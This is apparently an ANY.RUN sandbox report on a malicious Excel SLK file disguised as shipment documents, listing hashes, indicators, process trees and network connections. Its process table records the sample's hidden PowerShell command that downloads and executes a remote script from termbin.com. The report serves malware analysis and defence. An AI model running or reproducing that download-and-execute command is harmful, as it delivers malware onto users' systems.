analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

b5e82ab188d360f2ff5efa66aa7a09c7d9a0c3985b028fc3d584183de85358c4

Full analysis: https://app.any.run/tasks/0fe0c2ee-23e8-468c-93bc-7ff51bf11954
Verdict: Malicious activity
Analysis date: June 16, 2019, 13:30:10
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/gzip
File info: gzip compressed data, was "shipment documents.slk", last modified: Sat Jun 15 13:17:13 2019, max speed, from FAT filesystem (MS-DOS, OS/2, NT)
MD5:

7D77D0D59FA07473B8E3F56FB438349F

SHA1:

B70BF29A44970456FBCA59A09431C787FB0D6A0C

SHA256:

B5E82AB188D360F2FF5EFA66AA7A09C7D9A0C3985B028FC3D584183DE85358C4

SSDEEP:

3:Ft7sNV9kHpRHV6Oil6h0W0qC7VxEkT7rCAnQvNIIn4IPsDqn1PBe/OSGlFkan+at:XXFoOgWrC7VxErAnOIZIZPBe/OSGcsX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • EXCEL.EXE (PID: 2836)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2836)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 1504)
    • Modifies files in Chrome extension folder

      • chrome.exe (PID: 3536)
  • INFO

    • Manual execution by user

      • EXCEL.EXE (PID: 2836)
      • chrome.exe (PID: 3536)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2836)
    • Creates files in the user directory

      • EXCEL.EXE (PID: 2836)
    • Dropped object may contain Bitcoin addresses

      • chrome.exe (PID: 3536)
    • Application launched itself

      • chrome.exe (PID: 3536)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.z/gz/gzip | GZipped data (100)

EXIF

ZIP

Compression: Deflated
Flags: FileName
ModifyDate: 2019:06:15 15:17:13+02:00
ExtraFlags: Fastest Algorithm
OperatingSystem: FAT filesystem (MS-DOS, OS/2, NT/Win32)
ArchivedFileName: shipment documents.slk
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
63
Monitored processes
29
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs excel.exe no specs powershell.exe chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2716"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\b5e82ab188d360f2ff5efa66aa7a09c7d9a0c3985b028fc3d584183de85358c4.z"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
2836"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
1504powershell.exe -nop -w hidden -c IEX ((new-object Net.WebClient).DownloadString('https://termbin.com/ynbr'))C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3536"C:\Program Files\Google\Chrome\Application\chrome.exe" C:\Program Files\Google\Chrome\Application\chrome.exe
explorer.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
73.0.3683.75
3180"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=73.0.3683.75 --initial-client-data=0x7c,0x80,0x84,0x78,0x88,0x68ed0f18,0x68ed0f28,0x68ed0f34C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
73.0.3683.75
3620"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2060 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
73.0.3683.75
1008"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=964,6253974562697697189,11503176021465529302,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAACAAwAAAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --service-request-channel-token=3390364207324136124 --mojo-platform-channel-handle=956 --ignored=" --type=renderer " /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Version:
73.0.3683.75
836"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=964,6253974562697697189,11503176021465529302,131072 --enable-features=PasswordImport --service-pipe-token=10493527701874852987 --lang=en-US --instant-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=10493527701874852987 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1976 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
73.0.3683.75
3696"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=964,6253974562697697189,11503176021465529302,131072 --enable-features=PasswordImport --service-pipe-token=16116366432608573956 --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=16116366432608573956 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2172 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
73.0.3683.75
3432"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=964,6253974562697697189,11503176021465529302,131072 --enable-features=PasswordImport --service-pipe-token=10686802467078523793 --lang=en-US --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=10686802467078523793 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2160 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
73.0.3683.75
Total events
1 608
Read events
1 403
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
255
Text files
196
Unknown types
7

Dropped files

PID
Process
Filename
Type
2716WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa2716.33565\shipment documents.slk
MD5:
SHA256:
2836EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR8214.tmp.cvr
MD5:
SHA256:
1504powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9SCXK5ALYH5KWYAKZCX0.temp
MD5:
SHA256:
3536chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index
MD5:
SHA256:
3536chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0
MD5:
SHA256:
3536chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1
MD5:
SHA256:
3536chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_2
MD5:
SHA256:
3536chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_3
MD5:
SHA256:
3536chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\da631fb0-3281-44f0-8dde-035f56d06c9a.tmp
MD5:
SHA256:
3536chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000018.dbtmp
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
31
DNS requests
25
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3536
chrome.exe
GET
302
172.217.21.238:80
http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvMjJlQUFXRC12Ny1ldUFnMXF3SDlXZDlFZw/7319.128.0.1_pkedcjkdefgpdelpbcmbmeomcjbeemfm.crx
US
html
504 b
whitelisted
3536
chrome.exe
GET
200
173.194.5.41:80
http://r4---sn-aigzrn7e.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvMjJlQUFXRC12Ny1ldUFnMXF3SDlXZDlFZw/7319.128.0.1_pkedcjkdefgpdelpbcmbmeomcjbeemfm.crx?cms_redirect=yes&mip=217.147.89.18&mm=28&mn=sn-aigzrn7e&ms=nvh&mt=1560690999&mv=u&pl=22&shardbypass=yes
US
crx
842 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3536
chrome.exe
216.58.205.227:443
clientservices.googleapis.com
Google Inc.
US
whitelisted
1504
powershell.exe
5.39.93.71:443
termbin.com
OVH SAS
FR
unknown
3536
chrome.exe
172.217.23.142:443
clients2.google.com
Google Inc.
US
whitelisted
3536
chrome.exe
216.58.207.46:443
apis.google.com
Google Inc.
US
whitelisted
3536
chrome.exe
172.217.22.65:443
clients2.googleusercontent.com
Google Inc.
US
whitelisted
3536
chrome.exe
216.58.206.14:443
clients1.google.com
Google Inc.
US
whitelisted
3536
chrome.exe
172.217.21.195:443
www.gstatic.com
Google Inc.
US
whitelisted
3536
chrome.exe
172.217.18.3:443
ssl.gstatic.com
Google Inc.
US
whitelisted
3536
chrome.exe
172.217.22.13:443
accounts.google.com
Google Inc.
US
whitelisted
3536
chrome.exe
172.217.23.138:443
fonts.googleapis.com
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
termbin.com
  • 5.39.93.71
unknown
clientservices.googleapis.com
  • 216.58.205.227
whitelisted
www.google.com.ua
  • 216.58.205.227
whitelisted
accounts.google.com
  • 172.217.22.13
shared
clients1.google.com
  • 216.58.206.14
whitelisted
ssl.gstatic.com
  • 172.217.18.3
whitelisted
clients2.google.com
  • 172.217.23.142
whitelisted
www.gstatic.com
  • 172.217.21.195
whitelisted
clients2.googleusercontent.com
  • 172.217.22.65
whitelisted
apis.google.com
  • 216.58.207.46
whitelisted

Threats

No threats detected
No debug info